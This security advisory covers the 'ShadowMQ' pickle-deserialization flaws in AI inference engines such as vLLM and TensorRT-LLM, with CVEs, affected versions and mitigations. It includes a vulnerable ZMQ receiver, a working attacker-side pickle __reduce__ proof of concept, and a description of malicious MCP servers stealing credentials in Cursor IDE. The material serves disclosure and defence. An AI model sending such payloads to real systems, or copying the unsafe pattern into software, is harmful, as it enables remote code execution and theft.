ShadowMQ Vulnerabilities: Over 30 Critical Flaws in Meta Llama, NVIDIA TensorRT-LLM, vLLM, and Other AI Inference Engines Enable Data Theft and Remote Code Execution

Executive Summary
Recent cybersecurity research has revealed over 30 critical vulnerabilities in leading AI inference engines and related developer tooling, including Meta Llama LLM, vLLM, NVIDIA TensorRT-LLM, Modular Max Server, Microsoft Sarathi-Serve, and SGLang. These flaws, collectively identified as the "ShadowMQ" pattern, enable remote code execution (RCE) and data theft, representing a significant threat to organizations deploying AI infrastructure. The vulnerabilities primarily arise from insecure code reuse patterns involving ZeroMQ (ZMQ) and Python's pickle deserialization, which, when improperly exposed, allow attackers to execute arbitrary code and exfiltrate sensitive data. The widespread propagation of these insecure patterns across both proprietary and open-source AI projects amplifies the risk, making immediate remediation and robust mitigation strategies essential for all organizations leveraging these technologies.
Technical Information
The core of the ShadowMQ vulnerabilities lies in the unsafe use of ZeroMQ's recv_pyobj() method, which deserializes incoming data using Python's pickle module. This method, when exposed over a network interface, allows an attacker to transmit a maliciously crafted pickle object. Upon deserialization, the object can execute arbitrary code on the host system, leading to full remote code execution. This pattern was first identified in the Meta Llama LLM framework and subsequently propagated to other projects through direct code reuse and copy-paste practices, affecting a broad spectrum of AI inference engines.
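The following is a minimal sketch of the vulnerable pattern. The socket type, port, and handler function are illustrative assumptions, not code from any affected project; the essential flaw is that recv_pyobj() calls pickle.loads() on untrusted network input.

```python
# Minimal sketch of the vulnerable receiver pattern; names, port, and
# handler are illustrative assumptions, not code from any affected project.
import zmq

def handle_task(task):
    print("received task:", task)

context = zmq.Context()
socket = context.socket(zmq.PULL)
socket.bind("tcp://0.0.0.0:5555")  # exposed to the network, no authentication

while True:
    # recv_pyobj() runs pickle.loads() on whatever bytes arrive; a crafted
    # payload therefore executes attacker code during deserialization,
    # before handle_task() is ever called.
    task = socket.recv_pyobj()
    handle_task(task)
```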
The affected products include Meta Llama LLM, vLLM, NVIDIA TensorRT-LLM, Modular Max Server, Microsoft Sarathi-Serve, and SGLang. Each of these products either directly incorporated the vulnerable code or inherited it through dependencies. The vulnerabilities are tracked under several CVEs, including CVE-2024-50050 for Meta Llama LLM, CVE-2025-30165 for vLLM, CVE-2025-23254 for NVIDIA TensorRT-LLM, and CVE-2025-60455 for Modular Max Server. Notably, some products, such as Microsoft Sarathi-Serve and SGLang, remain unpatched or only partially remediated as of this report.
The technical exploitation involves an attacker identifying an exposed ZMQ socket, typically listening on default ports such as 5555 or 5556. The attacker then serializes a malicious Python object using pickle and transmits it to the target socket using ZMQ's send_pyobj() method. Upon receipt, the vulnerable service invokes recv_pyobj(), which deserializes and executes the attacker's payload. This can result in arbitrary command execution, privilege escalation, theft of AI models, and deployment of persistent malware such as cryptocurrency miners.
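A sketch of the attacker side of this flow is shown below. The target address and the deliberately benign demonstration command are assumptions for illustration; publicly disclosed proof-of-concept payloads follow the same __reduce__ pattern with arbitrary shell commands.

```python
# Attacker-side sketch of the exploitation flow described above. The target
# address and the benign demo command are assumptions for illustration only.
import os
import zmq

class MaliciousPayload:
    # pickle invokes __reduce__ during deserialization, so the victim's
    # recv_pyobj() call executes the returned callable with these arguments.
    def __reduce__(self):
        return (os.system, ("id > /tmp/shadowmq_poc",))

context = zmq.Context()
socket = context.socket(zmq.PUSH)
socket.connect("tcp://victim-host:5555")  # hypothetical exposed ZMQ socket
socket.send_pyobj(MaliciousPayload())     # serialized with pickle on send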
The vulnerabilities are particularly severe in clustered AI environments, where a single compromised node can facilitate lateral movement and compromise the entire cluster. Additionally, research by Knostic has demonstrated that related attack vectors exist in developer tools such as the Cursor IDE (a fork of VS Code), where malicious extensions or Model Context Protocol (MCP) servers can inject JavaScript, leading to credential theft and full workstation compromise.
Proof-of-concept exploits have been publicly disclosed, including a Python class that, when deserialized, executes arbitrary shell commands on the victim host. Security platforms such as Oligo ADR have demonstrated detection capabilities by monitoring for anomalous code execution within the pickle deserialization flow, which is atypical for legitimate AI inference operations.
The MITRE ATT&CK framework maps these techniques to T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter), T1078 (Valid Accounts), and T1566 (Phishing), reflecting the broad attack surface and potential for multi-stage exploitation.
Indicators of compromise include unusual network traffic to ZMQ TCP ports, unexpected files or scripts in AI inference engine directories, unrecognized processes spawned by AI services, and outbound connections from Cursor IDE to unknown servers following extension or MCP server installation.
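As a quick triage step, administrators can check hosts for listeners on the conventional ZMQ ports named above. This is a sketch assuming the default ports from this advisory; adjust the port list to your actual deployment and verify which process owns any open port.

```python
# Quick local check for listeners on the default ZMQ ports noted above.
# The port list is an assumption from this advisory; adjust per deployment.
import socket

SUSPECT_PORTS = [5555, 5556]

for port in SUSPECT_PORTS:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(1.0)
        if s.connect_ex(("127.0.0.1", port)) == 0:
            print(f"port {port} is open; verify which service owns it")
```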
Exploitation in the Wild
Active exploitation of these vulnerabilities has been observed in the wild. Attackers are leveraging exposed ZMQ sockets to deliver malicious pickle payloads, resulting in remote code execution, privilege escalation, and theft of proprietary AI models. In several documented cases, compromised systems have been used to deploy cryptocurrency miners, establish persistent backdoors, and facilitate lateral movement within AI clusters.
The attack surface is further expanded by the use of developer tools such as Cursor IDE, where malicious MCP servers or extensions can inject JavaScript to steal credentials or execute arbitrary code. This has been demonstrated in proof-of-concept attacks where fake login pages are served to users, capturing credentials and exfiltrating them to attacker-controlled infrastructure.
The vulnerabilities are particularly dangerous in environments where AI inference engines are deployed with default configurations, exposing ZMQ sockets to untrusted networks. In such scenarios, attackers can scan for open ports, deliver payloads, and achieve full system compromise with minimal effort.
APT Groups using this vulnerability
As of this report, no specific Advanced Persistent Threat (APT) group attribution has been made public regarding the exploitation of these vulnerabilities. However, the techniques and affected technologies are consistent with those historically targeted by APT groups focusing on cloud infrastructure, AI research environments, and technology sector organizations. The exploitation methods align with tactics used by groups seeking to exfiltrate intellectual property, disrupt AI operations, or establish persistent access within high-value environments. Organizations operating in these sectors should assume that sophisticated threat actors are capable of leveraging these vulnerabilities and should prioritize remediation accordingly.
Affected Product Versions
The following products and versions are confirmed to be affected by the ShadowMQ vulnerabilities:
- Meta Llama LLM: all versions prior to 0.0.41 are affected; patched in version 0.0.41 and above.
- vLLM: versions 0.5.2 through 0.8.5.post1 (V0 engine) and all versions prior to 0.10.0 are vulnerable; partially remediated in version 0.10.0 (the V1 engine is now used by default, but not all issues are fully resolved).
- NVIDIA TensorRT-LLM: all versions prior to 0.18.2 are affected; fixed in version 0.18.2 and above.
- Modular Max Server: all versions prior to 25.6 are vulnerable when the --experimental-enable-kvcache-agent flag is used; resolved in version 25.6 and above.
- Microsoft Sarathi-Serve: all released versions remain unpatched as of December 2025.
- SGLang: all released versions are affected as of December 2025, with only incomplete fixes available.
Organizations should consult the official advisories and release notes for each product to confirm the status of patches and recommended upgrade paths.
Workaround and Mitigation
Immediate action is required to mitigate the risk posed by these vulnerabilities. Organizations should apply all available patches for Meta Llama LLM (version 0.0.41 and above), NVIDIA TensorRT-LLM (version 0.18.2 and above), Modular Max Server (version 25.6 and above), and any other affected projects as soon as possible. For products such as vLLM, Microsoft Sarathi-Serve, and SGLang where full remediation is not yet available, organizations should implement compensating controls.
It is critical to ensure that ZMQ sockets are not exposed to untrusted networks. Network segmentation, firewall rules, and access controls should be enforced to restrict access to AI inference engine ports. Administrators should audit all code for unsafe deserialization practices, specifically searching for the use of pickle deserialization over network sockets, and refactor code to use safer serialization methods or implement strict input validation.
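One possible refactor is sketched below, under the assumption that task messages can be expressed as plain JSON; pyzmq's recv_json() exchanges only data, never executable objects. The loopback binding and the schema check are illustrative assumptions to adapt to your own message format.

```python
# Sketch of a safer replacement for recv_pyobj(); assumes messages can be
# represented as JSON and that the schema check below matches your tasks.
import zmq

context = zmq.Context()
socket = context.socket(zmq.PULL)
socket.bind("tcp://127.0.0.1:5555")  # bind to loopback, not 0.0.0.0

ALLOWED_KEYS = {"task_id", "prompt"}  # hypothetical schema for illustration

while True:
    msg = socket.recv_json()  # json.loads() under the hood: data only, no code
    if not isinstance(msg, dict) or not set(msg) <= ALLOWED_KEYS:
        continue  # reject anything outside the expected schema
    print("accepted task:", msg["task_id"])
```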
For environments utilizing Cursor IDE, install only MCP servers and extensions from trusted sources. Audit extension code and disable auto-run features to prevent unauthorized code execution. Monitoring for indicators of compromise, such as unusual network traffic, unexpected files, and anomalous process activity, is essential for early detection of exploitation attempts.
Organizations should also review their incident response plans to ensure readiness in the event of a compromise and consider deploying runtime application security monitoring solutions capable of detecting and blocking deserialization attacks.
References
- The Hacker News: Researchers Find Serious AI Bugs Exposing Meta, Nvidia, and Microsoft Inference Frameworks
- Oligo Security: CVE-2024-50050 Critical Vulnerability in meta-llama/llama-stack
- NVD: CVE-2024-50050
- NVD: CVE-2025-30165
- NVD: CVE-2025-23254
- NVD: CVE-2025-60455
- GitHub vLLM Advisory
- Security Bulletin: NVIDIA TensorRT LLM - April 2025
- Miggo Security: Modular Max Server
- eSecurityPlanet: ShadowMQ
- Knostic AI Security Platform
- PyZMQ Documentation
- Python Pickle Security
Rescana is here for you
Rescana empowers organizations to manage third-party risk and supply chain security with our advanced TPRM platform, providing continuous monitoring, automated risk assessment, and actionable intelligence. Our platform is designed to help you identify, prioritize, and remediate vulnerabilities across your digital ecosystem, ensuring resilience against emerging threats. If you have any questions about this advisory or require further assistance, we are happy to help at ops@rescana.com.